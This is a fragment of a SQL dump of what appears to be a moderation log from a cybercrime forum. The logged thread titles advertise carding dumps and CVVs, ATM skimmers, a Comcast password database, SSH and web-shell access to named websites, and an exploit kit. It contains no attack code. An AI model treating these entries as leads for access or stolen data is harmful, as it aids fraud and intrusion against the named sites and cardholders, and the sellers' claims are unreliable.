(350, 1449040714, 100, 10, 1196, 0, 0, 0, 'dumps', 4, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(351, 1449040714, 100, 10, 1697, 0, 0, 0, 'dumps', 4, 'mifcom.de', '141.101.80.23', '', 0, 0, 0, 0, 0),
(352, 1449040714, 100, 10, 1854, 0, 0, 0, 'dumps', 4, 'europarl.europa.eu', '141.101.80.23', '', 0, 0, 0, 0, 0),
(353, 1449040714, 100, 10, 1866, 0, 0, 0, 'dumps', 4, '1 миллиард e-mail', '141.101.80.23', '', 0, 0, 0, 0, 0),
(354, 1449040737, 100, 10, 1028, 0, 0, 0, 'remote', 4, 'Sec4ever', '141.101.80.23', '', 0, 0, 0, 0, 0),
(355, 1449040975, 100, 24, 1852, 0, 0, 0, '', 15, 'DEFCON & blackhat 2015', '141.101.80.23', '', 0, 0, 0, 0, 0),
(356, 1449041127, 100, 37, 1030, 1033, 0, 0, 'FuckAV.ru [private]', 20, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(357, 1449041167, 100, 37, 1031, 1034, 0, 0, 'OpenSC.ws', 20, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(358, 1449041236, 100, 37, 2346, 2919, 0, 0, '', 25, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(359, 1449041307, 100, 37, 2404, 0, 0, 0, '', 21, 'ComCast DB 590k users/plaintext passwords', '141.101.80.23', '', 0, 0, 0, 0, 0),
(360, 1449075721, 100, 37, 2342, 2935, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:6:\"*Hash*\";}', 18, '', '141.101.81.6', '', 0, 0, 0, 0, 0),
(361, 1449156770, 100, 35, 2419, 2939, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:8:\"foma9999\";}', 17, '[shell]*.lada.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(362, 1449156770, 100, 35, 2419, 2940, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:8:\"foma9999\";}', 17, '[shell]*.lada.ru', '141.101.80.23', '', 0, 0, 0, 0, 0),
(363, 1449469180, 100, 37, 1092, 2942, 0, 0, '', 25, '', '141.101.80.23', '', 0, 0, 0, 0, 0),
(364, 1449848383, 100, 37, 2463, 2947, 0, 0, '', 25, 'new dumps', '141.101.80.23', '', 0, 0, 0, 0, 0),
(365, 1449896093, 100, 38, 2461, 0, 0, 0, '', 21, 'Срочно нужны обьем акков турбо такс!!!!', '141.101.80.23', '', 0, 0, 0, 0, 0),
(366, 1450081210, 100, 35, 2465, 0, 0, 0, '', 21, 'geolify.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(367, 1450445583, 100, 35, 2460, 0, 0, 0, '', 22, 'mlg.ru - shell+src', '141.101.80.23', '', 0, 0, 0, 0, 0),
(368, 1450799447, 173, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:14:\"sEACHENGINE902\";}', 54, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(369, 1450799447, 173, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:4:\"w0rm\";}', 54, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(370, 1450812553, 100, 37, 2469, 0, 0, 0, '', 21, 'SpyProof Vpn', '141.101.80.23', '', 0, 0, 0, 0, 0),
(371, 1450884376, 100, 32, 2470, 0, 0, 0, 'w0rm course', 29, '[Course] Audit Web Resources', '141.101.80.23', '', 0, 0, 0, 0, 0),
(372, 1450958532, 100, 35, 2477, 0, 0, 0, '', 21, 'доступ по ssh на сервер cimco-software', '141.101.80.23', '', 0, 0, 0, 0, 0),
(373, 1450959038, 100, 35, 2475, 0, 0, 0, '', 14, 'доступ по ssh на сервер cimco', '141.101.80.23', '', 0, 0, 0, 0, 0),
(374, 1450959038, 100, 35, 2476, 0, 0, 0, '', 14, 'доступ по ssh на сервер cimco', '141.101.80.23', '', 0, 0, 0, 0, 0),
(375, 1451244555, 100, 35, 2379, 2969, 0, 0, '', 25, 'gamevil.com', '141.101.80.23', '', 0, 0, 0, 0, 0),
(376, 1451334023, 173, 35, 2379, 2846, 0, 0, 'gamevil.com', 20, 'gamevil.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(377, 1451334044, 173, 35, 2379, 2854, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:8:\"ropertus\";}', 17, 'gamevil.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(378, 1451484105, 100, 18, 2478, 0, 0, 0, '', 10, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(379, 1451485411, 100, 18, 2478, 0, 0, 0, '', 14, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(380, 1451485411, 100, 18, 2478, 2972, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:6:\"c3rb3l\";}', 17, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(381, 1451485411, 100, 18, 2478, 2973, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"w0rm\";}', 17, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(382, 1451485464, 100, 18, 2478, 0, 0, 0, '', 16, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(383, 1451485464, 100, 18, 2478, 0, 0, 0, 'a:3:{i:0;i:0;i:1;i:1;i:2;i:1;}', 6, 'w0rm fund', '141.101.80.23', '', 0, 0, 0, 0, 0),
(384, 1451485660, 173, 18, 2478, 2971, 0, 0, 'w0rm fund', 20, 'w0rm fund', '173.245.54.190', '', 0, 0, 0, 0, 0),
(385, 1451485941, 173, 18, 2478, 2974, 0, 0, 'a:2:{i:0;s:0:\"\";i:1;s:4:\"tdss\";}', 17, 'w0rm fund', '173.245.54.190', '', 0, 0, 0, 0, 0),
(386, 1451673244, 100, 37, 2469, 2968, 0, 0, '', 25, 'SpyProof Vpn', '141.101.80.23', '', 0, 0, 0, 0, 0),
(387, 1452390259, 33, 35, 2379, 2975, 0, 0, '', 25, 'gamevil.com', '141.101.80.17', '', 0, 0, 0, 0, 0),
(388, 1453533354, 100, 7, 1038, 1043, 0, 0, 'rog.asus.com', 20, '', '141.101.80.16', '', 0, 0, 0, 0, 0),
(389, 1453649441, 173, 15, 1025, 1028, 0, 0, 'gazavat', 20, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(390, 1453649470, 173, 15, 1025, 1028, 0, 0, 'gazavat', 20, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(391, 1453649999, 173, 15, 1025, 1028, 0, 0, 'gazavat', 20, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(392, 1453918077, 100, 7, 1038, 2984, 0, 0, '', 25, '', '141.101.80.14', '', 0, 0, 0, 0, 0),
(393, 1454514421, 100, 18, 2481, 0, 0, 0, '', 10, 'escrow', '141.101.81.4', '', 0, 0, 0, 0, 0),
(394, 1454685468, 383, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '188.114.103.244', '', 0, 0, 0, 0, 0),
(395, 1454899910, 13, 32, 2395, 2884, 0, 0, 'w0rm vds/vps', 20, 'w0rm vds/vps', '162.158.89.39', '', 0, 0, 0, 0, 0),
(396, 1454900106, 13, 32, 2386, 2861, 0, 0, 'Реализация кредитных карт (cvv)', 20, 'Реализация кредитных карт (cvv)', '162.158.89.39', '', 0, 0, 0, 0, 0),
(397, 1454900139, 13, 32, 2473, 2963, 0, 0, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', 20, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '162.158.89.39', '', 0, 0, 0, 0, 0),
(398, 1454900193, 13, 32, 2237, 2699, 0, 0, 'Отработка Ваших дампов', 20, 'Отработка Ваших дампов', '162.158.89.39', '', 0, 0, 0, 0, 0),
(399, 1454900271, 13, 35, 2379, 2846, 0, 0, 'gamevil.com', 20, 'gamevil.com', '162.158.89.39', '', 0, 0, 0, 0, 0),
(400, 1454900379, 13, 18, 2478, 2971, 0, 0, 'w0rm fund', 20, 'w0rm fund', '162.158.89.39', '', 0, 0, 0, 0, 0),
(401, 1454900526, 13, 35, 2468, 2956, 0, 0, '[shop+sql] уязвимость', 20, '[shop+sql] уязвимость', '162.158.89.39', '', 0, 0, 0, 0, 0),
(402, 1454900541, 13, 32, 2470, 2959, 0, 0, '[Course] Audit Web Resources', 20, '[Course] Audit Web Resources', '162.158.89.39', '', 0, 0, 0, 0, 0),
(403, 1454900556, 13, 35, 2464, 2951, 0, 0, 'tomtop.com root + db', 20, 'tomtop.com root + db', '162.158.89.39', '', 0, 0, 0, 0, 0),
(404, 1454900576, 13, 37, 2463, 2946, 0, 0, 'new dumps', 20, 'new dumps', '162.158.89.39', '', 0, 0, 0, 0, 0),
(405, 1454900747, 13, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '162.158.88.16', '', 0, 0, 0, 0, 0),
(406, 1454900780, 13, 35, 2462, 2945, 0, 0, 'sqli+web-shell arduino.org', 20, 'sqli+web-shell arduino.org', '162.158.88.16', '', 0, 0, 0, 0, 0),
(407, 1454900810, 13, 35, 2460, 2943, 0, 0, 'mlg.ru - shell+src', 20, 'mlg.ru - shell+src', '162.158.88.16', '', 0, 0, 0, 0, 0),
(408, 1454900820, 13, 35, 2459, 2941, 0, 0, '14k ftp/adm from megaindex.', 20, '14k ftp/adm from megaindex.', '162.158.88.16', '', 0, 0, 0, 0, 0),
(409, 1454900837, 13, 35, 2416, 2928, 0, 0, '[src+shell] *.megaindex.ru', 20, '[src+shell] *.megaindex.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(410, 1454900851, 13, 35, 2391, 2876, 0, 0, 'missgrandinternational.com', 20, 'missgrandinternational.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(411, 1454900934, 13, 38, 1856, 2288, 0, 0, 'Hunter ExploitKit', 20, 'Hunter ExploitKit', '162.158.88.16', '', 0, 0, 0, 0, 0),
(412, 1454900948, 13, 38, 1856, 2843, 0, 0, '', 20, 'Hunter ExploitKit', '162.158.88.16', '', 0, 0, 0, 0, 0),
(413, 1454901222, 13, 37, 2346, 2801, 0, 0, 'hackers & carders forums', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(414, 1454901233, 13, 37, 2346, 2865, 0, 0, '', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(415, 1454901315, 13, 37, 2342, 2800, 0, 0, 'Monopoly.ms', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(416, 1455313584, 383, 37, 2486, 0, 0, 0, '2487', 8, '', '188.114.103.241', '', 0, 0, 0, 0, 0),
(417, 1455552846, 13, 37, 2485, 2991, 0, 0, 'Selling dumps database', 20, 'Selling dumps database', '162.158.88.16', '', 0, 0, 0, 0, 0),
(418, 1455552872, 13, 37, 2483, 2988, 0, 0, 'topface.com', 20, 'topface.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(419, 1455552900, 13, 37, 2472, 2962, 0, 0, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', 20, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '162.158.88.16', '', 0, 0, 0, 0, 0),
(420, 1455552920, 13, 37, 2467, 2955, 0, 0, 'Dumps Updates Done With 98% Valid Rate ICQ:7447437', 20, 'Dumps Updates Done With 98% Valid Rate ICQ:7447437', '162.158.88.16', '', 0, 0, 0, 0, 0),
(421, 1455552931, 13, 37, 2463, 2946, 0, 0, 'new dumps', 20, 'new dumps', '162.158.88.16', '', 0, 0, 0, 0, 0),
(422, 1455552949, 13, 37, 2458, 2938, 0, 0, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', 20, 'Very Fresh Update done 100% VALIDITY DUMPZ(track1&2, D+P), FULLZ, CVV and more', '162.158.88.16', '', 0, 0, 0, 0, 0),
(423, 1455552959, 13, 37, 2346, 2801, 0, 0, 'hackers & carders forums', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(424, 1455552967, 13, 37, 2346, 2865, 0, 0, '', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(425, 1455552979, 13, 37, 2342, 2800, 0, 0, 'Monopoly.ms', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(426, 1455553028, 13, 37, 2404, 2913, 0, 0, 'ComCast DB 590k users/plaintext passwords', 20, 'ComCast DB 590k users/plaintext passwords', '162.158.88.16', '', 0, 0, 0, 0, 0),
(427, 1455553048, 13, 37, 2403, 2911, 0, 0, 'Comcast DB 590K users/plaintext passwords', 20, 'Comcast DB 590K users/plaintext passwords', '162.158.88.16', '', 0, 0, 0, 0, 0),
(428, 1455553108, 13, 37, 2401, 2909, 0, 0, 'Skimmed dumps,ccv,fullz,logins etc for sale', 20, 'Skimmed dumps,ccv,fullz,logins etc for sale', '162.158.88.16', '', 0, 0, 0, 0, 0),
(429, 1455553161, 13, 37, 2392, 2878, 0, 0, 'forum-seo.net', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(430, 1455553169, 13, 37, 2347, 2802, 0, 0, 'phreaker.us', 20, 'phreaker.us', '162.158.88.16', '', 0, 0, 0, 0, 0),
(431, 1455553233, 13, 37, 2315, 2782, 0, 0, 'Selling FTR (court software) forum DB!', 20, 'Selling FTR (court software) forum DB!', '162.158.88.16', '', 0, 0, 0, 0, 0),
(432, 1455553357, 13, 35, 2379, 2846, 0, 0, 'gamevil.com', 20, 'gamevil.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(433, 1455553366, 13, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '162.158.88.16', '', 0, 0, 0, 0, 0),
(434, 1455553450, 13, 35, 2468, 2956, 0, 0, '[shop+sql] уязвимость', 20, '[shop+sql] уязвимость', '162.158.88.16', '', 0, 0, 0, 0, 0),
(435, 1455553462, 13, 35, 2464, 2951, 0, 0, 'tomtop.com root + db', 20, 'tomtop.com root + db', '162.158.88.16', '', 0, 0, 0, 0, 0),
(436, 1455553470, 13, 35, 2462, 2945, 0, 0, 'sqli+web-shell arduino.org', 20, 'sqli+web-shell arduino.org', '162.158.88.16', '', 0, 0, 0, 0, 0),
(437, 1455553550, 13, 35, 2460, 2943, 0, 0, 'mlg.ru - shell+src', 20, 'mlg.ru - shell+src', '162.158.88.16', '', 0, 0, 0, 0, 0),
(438, 1455553572, 13, 35, 2459, 2941, 0, 0, '14k ftp/adm from megaindex.', 20, '14k ftp/adm from megaindex.', '162.158.88.16', '', 0, 0, 0, 0, 0),
(439, 1455553584, 13, 35, 2419, 2934, 0, 0, '[shell]*.lada.ru', 20, '[shell]*.lada.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(440, 1455553593, 13, 35, 2416, 2928, 0, 0, '[src+shell] *.megaindex.ru', 20, '[src+shell] *.megaindex.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(441, 1455553604, 13, 35, 2390, 2875, 0, 0, 'http://www.mashailalqasr.com', 20, 'http://www.mashailalqasr.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(442, 1455553612, 13, 35, 2391, 2876, 0, 0, 'missgrandinternational.com', 20, 'missgrandinternational.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(443, 1455553620, 13, 35, 2393, 2879, 0, 0, 'zebra.nsk.ru', 20, 'zebra.nsk.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(444, 1455553655, 13, 35, 2382, 2849, 0, 0, 'funimation.com', 20, 'funimation.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(445, 1455553663, 13, 35, 2381, 2848, 0, 0, 'lgbt.lt', 20, 'lgbt.lt', '162.158.88.16', '', 0, 0, 0, 0, 0),
(446, 1455553672, 13, 35, 2380, 2847, 0, 0, 'jdwetherspoon.co.uk', 20, 'jdwetherspoon.co.uk', '162.158.88.16', '', 0, 0, 0, 0, 0),
(447, 1455553686, 13, 35, 2384, 2852, 0, 0, 'sferos.one.lt', 20, 'sferos.one.lt', '162.158.88.16', '', 0, 0, 0, 0, 0),
(448, 1455553731, 13, 32, 2237, 2699, 0, 0, 'Отработка Ваших дампов', 20, 'Отработка Ваших дампов', '162.158.88.16', '', 0, 0, 0, 0, 0),
(449, 1455553744, 13, 32, 2470, 2959, 0, 0, '[Course] Audit Web Resources', 20, '[Course] Audit Web Resources', '162.158.88.16', '', 0, 0, 0, 0, 0),
(450, 1455553758, 13, 32, 2473, 2963, 0, 0, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', 20, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '162.158.88.16', '', 0, 0, 0, 0, 0),
(451, 1455553767, 13, 32, 2386, 2861, 0, 0, 'Реализация кредитных карт (cvv)', 20, 'Реализация кредитных карт (cvv)', '162.158.88.16', '', 0, 0, 0, 0, 0),
(452, 1455553785, 13, 32, 2414, 2926, 0, 0, 'I am good seller for eu,usa,canada dumps only .', 20, 'I am good seller for eu,usa,canada dumps only .', '162.158.88.16', '', 0, 0, 0, 0, 0),
(453, 1455553794, 13, 32, 2395, 2884, 0, 0, 'w0rm vds/vps', 20, 'w0rm vds/vps', '162.158.88.16', '', 0, 0, 0, 0, 0),
(454, 1455553851, 13, 38, 1856, 2288, 0, 0, 'Hunter ExploitKit', 20, 'Hunter ExploitKit', '162.158.88.16', '', 0, 0, 0, 0, 0),
(455, 1455895645, 13, 38, 1856, 2288, 0, 0, 'Hunter ExploitKit', 20, 'Hunter ExploitKit', '162.158.88.16', '', 0, 0, 0, 0, 0),
(456, 1455895665, 13, 38, 2318, 2786, 0, 0, 'Selling SEO forum (very active)!', 20, 'Selling SEO forum (very active)!', '162.158.88.16', '', 0, 0, 0, 0, 0),
(457, 1455895702, 13, 37, 2483, 2988, 0, 0, 'topface.com', 20, 'topface.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(458, 1455895713, 13, 37, 2463, 2946, 0, 0, 'new dumps', 20, 'new dumps', '162.158.88.16', '', 0, 0, 0, 0, 0),
(459, 1455895731, 13, 37, 2346, 2801, 0, 0, 'hackers & carders forums', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(460, 1455895739, 13, 37, 2346, 2865, 0, 0, '', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(461, 1455895750, 13, 37, 2342, 2800, 0, 0, 'Monopoly.ms', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(462, 1455895762, 13, 37, 2392, 2878, 0, 0, 'forum-seo.net', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(463, 1455895769, 13, 37, 2347, 2802, 0, 0, 'phreaker.us', 20, 'phreaker.us', '162.158.88.16', '', 0, 0, 0, 0, 0),
(464, 1455895776, 13, 37, 2315, 2782, 0, 0, 'Selling FTR (court software) forum DB!', 20, 'Selling FTR (court software) forum DB!', '162.158.88.16', '', 0, 0, 0, 0, 0),
(465, 1455895896, 13, 32, 2395, 2884, 0, 0, 'w0rm vds/vps', 20, 'w0rm vds/vps', '162.158.88.16', '', 0, 0, 0, 0, 0),
(466, 1455895919, 13, 32, 2470, 2959, 0, 0, '[Course] Audit Web Resources', 20, '[Course] Audit Web Resources', '162.158.88.16', '', 0, 0, 0, 0, 0),
(467, 1455895934, 13, 32, 2237, 2699, 0, 0, 'Отработка Ваших дампов', 20, 'Отработка Ваших дампов', '162.158.88.16', '', 0, 0, 0, 0, 0),
(468, 1455895951, 13, 32, 2239, 2702, 0, 0, 'w0rm.ws Jabber', 20, '', '162.158.88.16', '', 0, 0, 0, 0, 0),
(469, 1455895992, 13, 35, 2379, 2846, 0, 0, 'gamevil.com', 20, 'gamevil.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(470, 1455896001, 13, 35, 2477, 2967, 0, 0, 'доступ по ssh на сервер cimco-software', 20, 'доступ по ssh на сервер cimco-software', '162.158.88.16', '', 0, 0, 0, 0, 0),
(471, 1455896011, 13, 35, 2468, 2956, 0, 0, '[shop+sql] уязвимость', 20, '[shop+sql] уязвимость', '162.158.88.16', '', 0, 0, 0, 0, 0),
(472, 1455896023, 13, 35, 2464, 2951, 0, 0, 'tomtop.com root + db', 20, 'tomtop.com root + db', '162.158.88.16', '', 0, 0, 0, 0, 0),
(473, 1455896045, 13, 35, 2462, 2945, 0, 0, 'sqli+web-shell arduino.org', 20, 'sqli+web-shell arduino.org', '162.158.88.16', '', 0, 0, 0, 0, 0),
(474, 1455896054, 13, 35, 2460, 2943, 0, 0, 'mlg.ru - shell+src', 20, 'mlg.ru - shell+src', '162.158.88.16', '', 0, 0, 0, 0, 0),
(475, 1455896064, 13, 35, 2459, 2941, 0, 0, '14k ftp/adm from megaindex.', 20, '14k ftp/adm from megaindex.', '162.158.88.16', '', 0, 0, 0, 0, 0),
(476, 1455896075, 13, 35, 2419, 2934, 0, 0, '[shell]*.lada.ru', 20, '[shell]*.lada.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(477, 1455896083, 13, 35, 2416, 2928, 0, 0, '[src+shell] *.megaindex.ru', 20, '[src+shell] *.megaindex.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(478, 1455896108, 13, 35, 2390, 2875, 0, 0, 'http://www.mashailalqasr.com', 20, 'http://www.mashailalqasr.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(479, 1455896150, 13, 35, 2391, 2876, 0, 0, 'missgrandinternational.com', 20, 'missgrandinternational.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(480, 1455896163, 13, 35, 2393, 2879, 0, 0, 'zebra.nsk.ru', 20, 'zebra.nsk.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(481, 1455896189, 13, 35, 2382, 2849, 0, 0, 'funimation.com', 20, 'funimation.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(482, 1455896211, 13, 35, 2381, 2848, 0, 0, 'lgbt.lt', 20, 'lgbt.lt', '162.158.88.16', '', 0, 0, 0, 0, 0),
(483, 1455896219, 13, 35, 2380, 2847, 0, 0, 'jdwetherspoon.co.uk', 20, 'jdwetherspoon.co.uk', '162.158.88.16', '', 0, 0, 0, 0, 0),
(484, 1455896228, 13, 35, 2383, 2851, 0, 0, '', 20, 'totallywicked-eliquid.com/de/co.uk/jp', '162.158.88.16', '', 0, 0, 0, 0, 0),
(485, 1455896236, 13, 35, 2384, 2852, 0, 0, 'sferos.one.lt', 20, 'sferos.one.lt', '162.158.88.16', '', 0, 0, 0, 0, 0),
(486, 1455896268, 13, 35, 2385, 2853, 0, 0, 'lorealparis.com.cn', 20, 'lorealparis.com.cn', '162.158.88.16', '', 0, 0, 0, 0, 0),
(487, 1455896278, 13, 35, 2375, 2840, 0, 0, 'galaxybis.com', 20, 'galaxybis.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(488, 1455896288, 13, 35, 2371, 2833, 0, 0, 'polisportal.ru', 20, 'polisportal.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(489, 1455896301, 13, 35, 2369, 2831, 0, 0, 'mega-torrent.ru', 20, 'mega-torrent.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(490, 1455896308, 13, 35, 2368, 2830, 0, 0, 'torrent.tlt.ru', 20, 'torrent.tlt.ru', '162.158.88.16', '', 0, 0, 0, 0, 0),
(491, 1455896323, 13, 35, 2356, 2811, 0, 0, 'biogents.com', 20, 'biogents.com', '162.158.88.16', '', 0, 0, 0, 0, 0),
(492, 1455896348, 13, 35, 2354, 2809, 0, 0, 'lodka.com.ua', 20, 'lodka.com.ua', '162.158.88.16', '', 0, 0, 0, 0, 0),
(493, 1455897018, 13, 37, 2403, 2911, 0, 0, 'Comcast DB 590K users/plaintext passwords', 20, 'Comcast DB 590K users/plaintext passwords', '162.158.88.16', '', 0, 0, 0, 0, 0),
(494, 1456050103, 100, 36, 2480, 0, 0, 0, '', 14, 'doc 0day', '141.101.81.21', '', 0, 0, 0, 0, 0),
(495, 1456128456, 383, 37, 2347, 2802, 0, 0, 'phreaker.us', 20, 'phreaker.us', '162.158.89.22', '', 0, 0, 0, 0, 0),
(496, 1456128701, 383, 37, 2463, 2946, 0, 0, 'new dumps', 20, 'new dumps', '162.158.89.22', '', 0, 0, 0, 0, 0),
(497, 1456128739, 383, 37, 2342, 2800, 0, 0, 'Monopoly.ms', 20, '', '162.158.89.22', '', 0, 0, 0, 0, 0),
(498, 1456128780, 383, 37, 2342, 2800, 0, 0, 'Monopoly.ms', 20, '', '162.158.89.22', '', 0, 0, 0, 0, 0),
(499, 1456128861, 383, 37, 2346, 2801, 0, 0, 'hackers & carders forums', 20, '', '162.158.89.22', '', 0, 0, 0, 0, 0),
(500, 1456128876, 383, 37, 2346, 2865, 0, 0, '', 20, '', '162.158.89.22', '', 0, 0, 0, 0, 0),
(501, 1456128907, 383, 37, 2404, 2913, 0, 0, 'ComCast DB 590k users/plaintext passwords', 20, 'ComCast DB 590k users/plaintext passwords', '162.158.89.22', '', 0, 0, 0, 0, 0),
(502, 1456129116, 383, 37, 2404, 2913, 0, 0, 'ComCast DB 590k users/plaintext passwords', 20, 'ComCast DB 590k users/plaintext passwords', '162.158.89.22', '', 0, 0, 0, 0, 0),
(503, 1456130796, 383, 38, 2318, 2786, 0, 0, 'Selling SEO forum (very active)!', 20, 'Selling SEO forum (very active)!', '188.114.103.247', '', 0, 0, 0, 0, 0),
(504, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:7:\"sandboy\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(505, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(506, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(507, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(508, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(509, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(510, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(511, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:14:\"sEACHENGINE902\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(512, 1456244243, 1, 0, 0, 0, 0, 0, 'a:2:{i:0;s:5:\"orion\";i:1;s:5:\"admin\";}', 55, '', '141.101.104.54', '', 0, 0, 0, 0, 0),
(513, 1456423851, 100, 18, 2493, 0, 0, 0, '', 14, 'Введение Руководство', '141.101.80.228', '', 0, 0, 0, 0, 0),
(514, 1457138362, 100, 18, 1652, 0, 0, 0, '', 14, 'Mini black list;', '162.158.89.28', '', 0, 0, 0, 0, 0),
(515, 1457883960, 173, 32, 2239, 2702, 0, 0, 'w0rm.ws Jabber', 20, '', '173.245.54.190', '', 0, 0, 0, 0, 0),
(516, 1457902895, 173, 38, 2479, 0, 0, 0, '[Looking For] Formgrabber/Webinjects Partner', 29, '[Looking For] Socks5 Bot Coding Partner (for a friend)', '173.245.54.190', '', 0, 0, 0, 0, 0),
(517, 1457902895, 173, 38, 2479, 0, 0, 0, 'a:3:{i:0;i:1;i:1;i:1;i:2;i:0;}', 6, '[Looking For] Socks5 Bot Coding Partner (for a friend)', '173.245.54.190', '', 0, 0, 0, 0, 0),
(518, 1457982529, 173, 37, 2483, 2988, 0, 0, 'topface.com', 20, 'topface.com', '173.245.54.190', '', 0, 0, 0, 0, 0),
(519, 1457982561, 173, 37, 2485, 2991, 0, 0, 'Selling dumps database', 20, 'Selling dumps database', '173.245.54.190', '', 0, 0, 0, 0, 0),
(520, 1457982734, 173, 37, 2472, 2962, 0, 0, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', 20, 'I Sell Cvv,Bank transfer,Atm Skimmer,tRACK 1&2,Banklogins,Atm plastic cards,ETC Repla', '173.245.54.190', '', 0, 0, 0, 0, 0),
(521, 1457982892, 173, 37, 2467, 2955, 0, 0, 'Dumps Updates Done With 98% Valid Rate ICQ:7447437', 20, 'Dumps Updates Done With 98% Valid Rate ICQ:7447437', '173.245.54.190', '', 0, 0, 0, 0, 0),
(522, 1457982942, 173, 24, 2489, 3004, 0, 0, '', 20, 'syslink (ex SuperModerator)', '173.245.54.190', '', 0, 0, 0, 0, 0),
